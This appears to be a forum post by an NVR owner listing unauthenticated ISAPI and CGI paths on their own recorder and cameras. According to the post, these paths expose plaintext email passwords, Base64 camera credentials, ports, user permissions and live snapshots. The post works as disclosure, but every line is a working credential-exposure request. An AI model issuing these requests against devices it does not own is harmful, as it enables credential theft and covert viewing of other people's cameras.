These were the major ones, but it seems they were patched on mine, not that they are for every model...The URLs are case sensitive, your ip address has to go in front of these and they are all "GET"s. No authentication was required for any of these and I used POSTMAN.
Obtain email address and password in plain text:
/ISAPI/System/Network/mailing
IP addresses, user names, and passwords for cameras connected to your NVR. Passwords are in Base64 so you can decode and see your password in text:
/ISAPI/ContentMgmt/InputProxy/channels/status
and
/ISAPI/ContentMgmt/InputProxy/channels/
All your ports being used for your NVR:
/ISAPI/Security/adminAccesses
UPnP ports:
/ISAPI/System/Network/UPnP/ports/status
NVR information:
/ISAPI/System/deviceInfo
User Permissions (modify the number at the end to see other users):
/ISAPI/Security/UserPermission/1
Here are some still open on mine. There are others but I don't want to ruin all of your fun of finding them. :)
- /ISAPI/Security/users
- /ISAPI/ContentMgmt/InputProxy
- /doc/script/params/device.js
- /doc/script/checkform.js
- /doc/script/params/user.js
- /doc/script/login.js
Here is another thing. In POSTMAN, on your local network, type in the ip address of one of your cameras and you can view a snapshot from it with no authentication. So essentially anyone on your network can access the cameras fairly easily.
- cameraipaddress/cgi-bin/video_snapshot.cgi